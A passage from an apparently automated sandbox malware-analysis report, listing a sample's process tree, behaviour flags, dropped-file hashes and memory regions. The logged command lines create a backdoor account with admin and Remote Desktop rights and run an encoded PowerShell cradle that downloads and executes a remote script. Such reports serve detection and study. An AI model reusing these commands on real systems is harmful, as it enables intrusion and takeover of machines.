      Command line: net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
      - Suspicious use of WriteProcessMemory

    [3] C:\Windows\system32\net1.exe
        Command line: C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" wgautilacc /ADD

[1] C:\Windows\System32\cmd.exe
    Command line: cmd /C net.exe LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD
    - Suspicious use of WriteProcessMemory

  [2] C:\Windows\system32\net.exe
      Command line: net.exe LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD
      - Suspicious use of WriteProcessMemory

    [3] C:\Windows\system32\net1.exe
        Command line: C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD

[1] C:\Windows\System32\cmd.exe
    Command line: cmd /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD
    - Suspicious use of WriteProcessMemory

  [2] C:\Windows\system32\net.exe
      Command line: net.exe LOCALGROUP "Administrators" wgautilacc /ADD

    [3] C:\Windows\system32\net1.exe
        Command line: C:\Windows\system32\net1 LOCALGROUP "Administrators" wgautilacc /ADD

[1] C:\Windows\System32\cmd.exe
    Command line: cmd /C net.exe user wgautilacc b1mq90yo

  [2] C:\Windows\system32\net.exe
      Command line: net.exe user wgautilacc b1mq90yo

    [3] C:\Windows\system32\net1.exe
        Command line: C:\Windows\system32\net1 user wgautilacc b1mq90yo

[1] C:\Windows\System32\cmd.exe
    Command line: cmd.exe /C wmic path win32_VideoController get name

  [2] C:\Windows\System32\Wbem\WMIC.exe
      Command line: wmic path win32_VideoController get name

[1] C:\Windows\System32\cmd.exe
    Command line: cmd.exe /C wmic CPU get NAME

  [2] C:\Windows\System32\Wbem\WMIC.exe
      Command line: wmic CPU get NAME

[1] C:\Windows\System32\cmd.exe
    Command line: cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA

  [2] C:\Windows\system32\cmd.exe
      Command line: cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA

    [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Command line: powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
        - Blocklisted process makes network request
        - Drops file in Program Files directory
        - Drops file in Windows directory
        - Modifies data under HKEY_USERS
        - Suspicious behavior: EnumeratesProcesses

[1] C:\Windows\System32\cmd.exe
    Command line: cmd.exe /C net user wgautilacc 1234

  [2] C:\Windows\system32\net.exe
      Command line: net user wgautilacc 1234

    [3] C:\Windows\system32\net1.exe
        Command line: C:\Windows\system32\net1 user wgautilacc 1234
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Users\Admin\AppData\Local\Temp\Get-Content.PS1
- C:\Users\Admin\AppData\Local\Temp\RES6B81.tmp
- C:\Users\Admin\AppData\Local\Temp\XfkRrAZJGQ.exe
- C:\Users\Admin\AppData\Local\Temp\jacslsk4\jacslsk4.dll
- C:\Users\Admin\AppData\Local\Temp\ready.ps1
- \??\c:\Users\Admin\AppData\Local\Temp\jacslsk4\CSC78E3A215782F48DD9CB5172249BAE1F.TMP
- \??\c:\Users\Admin\AppData\Local\Temp\jacslsk4\jacslsk4.0.cs
- \??\c:\Users\Admin\AppData\Local\Temp\jacslsk4\jacslsk4.cmdline
-
\Users\Admin\AppData\LocalLow\gC9tT2iQ3s\freebl3.dllMD5
60acd24430204ad2dc7f148b8cfe9bdc
SHA1989f377b9117d7cb21cbe92a4117f88f9c7693d9
SHA2569876c53134dbbec4dcca67581f53638eba3fea3a15491aa3cf2526b71032da97
SHA512626c36e9567f57fa8ec9c36d96cbadede9c6f6734a7305ecfb9f798952bbacdfa33a1b6c4999ba5b78897dc2ec6f91870f7ec25b2ceacbaee4be942fe881db01
-
\Users\Admin\AppData\LocalLow\gC9tT2iQ3s\freebl3.dllMD5
60acd24430204ad2dc7f148b8cfe9bdc
SHA1989f377b9117d7cb21cbe92a4117f88f9c7693d9
SHA2569876c53134dbbec4dcca67581f53638eba3fea3a15491aa3cf2526b71032da97
SHA512626c36e9567f57fa8ec9c36d96cbadede9c6f6734a7305ecfb9f798952bbacdfa33a1b6c4999ba5b78897dc2ec6f91870f7ec25b2ceacbaee4be942fe881db01
-
\Users\Admin\AppData\LocalLow\gC9tT2iQ3s\mozglue.dllMD5
eae9273f8cdcf9321c6c37c244773139
SHA18378e2a2f3635574c106eea8419b5eb00b8489b0
SHA256a0c6630d4012ae0311ff40f4f06911bcf1a23f7a4762ce219b8dffa012d188cc
SHA51206e43e484a89cea9ba9b9519828d38e7c64b040f44cdaeb321cbda574e7551b11fea139ce3538f387a0a39a3d8c4cba7f4cf03e4a3c98db85f8121c2212a9097
-
\Users\Admin\AppData\LocalLow\gC9tT2iQ3s\nss3.dllMD5
02cc7b8ee30056d5912de54f1bdfc219
SHA1a6923da95705fb81e368ae48f93d28522ef552fb
SHA2561989526553fd1e1e49b0fea8036822ca062d3d39c4cab4a37846173d0f1753d5
SHA5120d5dfcf4fb19b27246fa799e339d67cd1b494427783f379267fb2d10d615ffb734711bab2c515062c078f990a44a36f2d15859b1dacd4143dcc35b5c0cee0ef5
-
\Users\Admin\AppData\LocalLow\gC9tT2iQ3s\softokn3.dllMD5
4e8df049f3459fa94ab6ad387f3561ac
SHA106ed392bc29ad9d5fc05ee254c2625fd65925114
SHA25625a4dae37120426ab060ebb39b7030b3e7c1093cc34b0877f223b6843b651871
SHA5123dd4a86f83465989b2b30c240a7307edd1b92d5c1d5c57d47eff287dc9daa7bace157017908d82e00be90f08ff5badb68019ffc9d881440229dcea5038f61cd6
-
\Users\Admin\AppData\LocalLow\sqlite3.dllMD5
f964811b68f9f1487c2b41e1aef576ce
SHA1b423959793f14b1416bc3b7051bed58a1034025f
SHA25683bc57dcf282264f2b00c21ce0339eac20fcb7401f7c5472c0cd0c014844e5f7
SHA512565b1a7291c6fcb63205907fcd9e72fc2e11ca945afc4468c378edba882e2f314c2ac21a7263880ff7d4b84c2a1678024c1ac9971ac1c1de2bfa4248ec0f98c4
-
\Windows\Branding\mediasrv.pngMD5
1da8e368cb917044f7440a54d79f6737
SHA1df60dd7011bc948f3b871b1a6cb149a7028c1a85
SHA256dce86185269e01eba9301b761ae9a002054713060e35dbc908d44ddd8e647bd4
SHA5128437463516b7da13a661d5acdadd8d52641464e797831e635d697aa863c2c01b3f15be67073d08f2d9361f639b4ee1eaf9a0c8b2811f3cd3d78c43e55651fa92
-
\Windows\Branding\mediasvc.pngMD5
009e8b6a916836a4a8aa2be3229276a1
SHA128f3892fb8b63e7299dce25cb65bf252e29d5afd
SHA25639ec650a006fc423825d552edf526443c96b5a027f58e6423e6344d90b228ab7
SHA512a47a29ce28659d2839d808a614d9537fdcefcc08509f5e0cab0c747ebb7f04453781647e475934b4db5e254127e8621cedab01efd425fb5af23cac8dfcf9d7dc
-
memory/744-251-0x0000000000000000-mapping.dmp
-
memory/744-227-0x0000000000000000-mapping.dmp
-
memory/744-241-0x0000000000000000-mapping.dmp
-
memory/752-230-0x0000000000000000-mapping.dmp
-
memory/796-238-0x0000000000000000-mapping.dmp
-
memory/1120-223-0x0000000000000000-mapping.dmp
-
memory/1120-259-0x0000000000000000-mapping.dmp
-
memory/1212-222-0x0000000000000000-mapping.dmp
-
memory/1380-126-0x0000000000000000-mapping.dmp
-
memory/1492-232-0x0000000000000000-mapping.dmp
-
memory/1588-249-0x0000000000000000-mapping.dmp
-
memory/1592-228-0x0000000000000000-mapping.dmp
-
memory/1772-243-0x0000000000000000-mapping.dmp
-
memory/2116-258-0x0000000000000000-mapping.dmp
-
memory/2148-239-0x0000000000000000-mapping.dmp
-
memory/2148-225-0x0000000000000000-mapping.dmp
-
memory/2152-127-0x000001A5716B0000-0x000001A571AD1000-memory.dmpFilesize
4.1MB
-
memory/2152-122-0x0000000000000000-mapping.dmp
-
memory/2152-130-0x000001A571273000-0x000001A571275000-memory.dmpFilesize
8KB
-
memory/2152-129-0x000001A571270000-0x000001A571272000-memory.dmpFilesize
8KB
-
memory/2152-132-0x000001A571276000-0x000001A571277000-memory.dmpFilesize
4KB
-
memory/2152-131-0x000001A571275000-0x000001A571276000-memory.dmpFilesize
4KB
-
memory/2284-233-0x0000000000000000-mapping.dmp
-
memory/2304-218-0x000001B77DBE0000-0x000001B77DBE2000-memory.dmpFilesize
8KB
-
memory/2304-220-0x000001B77DBE6000-0x000001B77DBE8000-memory.dmpFilesize
8KB
-
memory/2304-216-0x0000000000000000-mapping.dmp
-
memory/2304-219-0x000001B77DBE3000-0x000001B77DBE5000-memory.dmpFilesize
8KB
-
memory/2388-114-0x0000000000640000-0x00000000006D1000-memory.dmpFilesize
580KB
-
memory/2388-115-0x0000000000400000-0x0000000000496000-memory.dmpFilesize
600KB
-
memory/2396-234-0x0000000000000000-mapping.dmp
-
memory/2616-260-0x0000000000000000-mapping.dmp
-
memory/2624-257-0x0000000000000000-mapping.dmp
-
memory/2704-217-0x0000020C98EE6000-0x0000020C98EE8000-memory.dmpFilesize
8KB
-
memory/2704-212-0x0000000000000000-mapping.dmp
-
memory/2704-215-0x0000020C98EE3000-0x0000020C98EE5000-memory.dmpFilesize
8KB
-
memory/2704-214-0x0000020C98EE0000-0x0000020C98EE2000-memory.dmpFilesize
8KB
-
memory/2728-237-0x0000000000000000-mapping.dmp
-
memory/2752-240-0x0000000000000000-mapping.dmp
-
memory/2892-155-0x0000000000000000-mapping.dmp
-
memory/3152-229-0x0000000000000000-mapping.dmp
-
memory/3152-248-0x0000000000000000-mapping.dmp
-
memory/3324-247-0x0000000000000000-mapping.dmp
-
memory/3340-250-0x0000000000000000-mapping.dmp
-
memory/3532-256-0x0000027EFA778000-0x0000027EFA779000-memory.dmpFilesize
4KB
-
memory/3532-252-0x0000000000000000-mapping.dmp
-
memory/3532-253-0x0000027EFA770000-0x0000027EFA772000-memory.dmpFilesize
8KB
-
memory/3532-254-0x0000027EFA773000-0x0000027EFA775000-memory.dmpFilesize
8KB
-
memory/3532-255-0x0000027EFA776000-0x0000027EFA778000-memory.dmpFilesize
8KB
-
memory/3532-244-0x0000000000000000-mapping.dmp
-
memory/3548-231-0x0000000000000000-mapping.dmp
-
memory/3732-158-0x0000000000000000-mapping.dmp
-
memory/3748-191-0x000001997EA33000-0x000001997EA35000-memory.dmpFilesize
8KB
-
memory/3748-177-0x0000000000000000-mapping.dmp
-
memory/3748-210-0x000001997EA36000-0x000001997EA38000-memory.dmpFilesize
8KB
-
memory/3748-213-0x000001997EA38000-0x000001997EA3A000-memory.dmpFilesize
8KB
-
memory/3748-190-0x000001997EA30000-0x000001997EA32000-memory.dmpFilesize
8KB
-
memory/3764-245-0x0000000000000000-mapping.dmp
-
memory/3780-246-0x0000000000000000-mapping.dmp
-
memory/3784-226-0x0000000000000000-mapping.dmp
-
memory/3784-242-0x0000000000000000-mapping.dmp
-
memory/3820-149-0x000001E69FC23000-0x000001E69FC25000-memory.dmpFilesize
8KB
-
memory/3820-169-0x000001E6A0DA0000-0x000001E6A0DA1000-memory.dmpFilesize
4KB
-
memory/3820-133-0x0000000000000000-mapping.dmp
-
memory/3820-170-0x000001E6A1130000-0x000001E6A1131000-memory.dmpFilesize
4KB
-
memory/3820-162-0x000001E6A0950000-0x000001E6A0951000-memory.dmpFilesize
4KB
-
memory/3820-148-0x000001E69FC20000-0x000001E69FC22000-memory.dmpFilesize
8KB
-
memory/3820-139-0x000001E6A06F0000-0x000001E6A06F1000-memory.dmpFilesize
4KB
-
memory/3820-144-0x000001E6A09A0000-0x000001E6A09A1000-memory.dmpFilesize
4KB
-
memory/3820-164-0x000001E69FC26000-0x000001E69FC28000-memory.dmpFilesize
8KB
-
memory/3820-221-0x000001E69FC28000-0x000001E69FC29000-memory.dmpFilesize
4KB
-
memory/3952-125-0x0000000000000000-mapping.dmp
-
memory/4088-224-0x0000000000000000-mapping.dmp